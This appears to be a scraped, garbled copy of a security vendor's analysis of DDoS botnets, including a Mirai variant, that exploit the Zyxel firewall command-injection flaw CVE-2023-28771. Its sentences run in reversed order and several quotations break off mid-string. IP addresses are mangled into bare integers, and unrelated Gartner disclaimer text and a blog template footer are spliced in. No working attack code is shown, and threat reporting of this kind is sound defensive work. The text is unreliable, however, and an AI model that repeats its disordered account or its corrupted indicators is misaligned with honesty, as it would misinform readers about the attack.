![]() ![]() These scripts employ the " rm -rf" command to remove the ". The script files in Figure 5 exhibit similar code patterns despite originating from different server IP addresses. However, we observed this script being forwarded to 1712213618, where it dropped additional MIPS files for subsequent actions. The script file shown in Figure 4 was downloaded from 1712213615, which has been associated with the Rapperbot malware. Subsequently, it executes with the "zywall" parameter indicating its connection to the Zyxel firewall vulnerability. In Figure 3, the script downloads a file named " lolmips" from the IP address 921183916 and saves it as ". The script files obtained in these attacks exclusively download files tailored for the MIPS architecture, indicating a highly specific target. In this article, we will provide a detailed explanation of the payload delivered through CVE-2023-28771 and associated botnets. We also identified multiple botnets, including Dark.IoT, a variant based on Mirai, as well as another botnet that employs customized DDoS attack methods. ![]() Analysis conducted by FortiGuard Labs has identified a significant increase in attack bursts starting from May, as depicted in the trigger count graph shown in Figure 1. Since the publication of the exploit module, there has been a sustained surge in malicious activity. Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America, East Asia, and South Asia. Subsequently, the Cybersecurity and Infrastructure Security Agency (CISA) added this security flaw to its Known Exploited Vulnerabilities (KEV) catalog in May. Zyxel released a security advisory regarding this vulnerability on April 25, 2023. The severity of this flaw, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. This vulnerability is characterized by a command injection flaw affecting multiple firewall models that could potentially allow an unauthorized attacker to execute arbitrary code by sending a specifically crafted packet to the targeted device. In June 2023, FortiGuard Labs detected the propagation of several DDoS botnets exploiting the Zyxel vulnerability ( CVE-2023-28771 ). ![]() Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.Impact: Remote attackers gain control of the vulnerable systems Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. The Gartner document is available upon request from Fortinet. as part of a larger research document and should be evaluated in the context of the entire document. This graphic was published by Gartner, Inc. and internationally and are used herein with permission. GARTNER is a registered trademarks and service mark, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. Gartner, Magic Quadrant for Enterprise Wired and Wireless LAN Infrastructure, Mike Toussiant, 22 December 2022. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |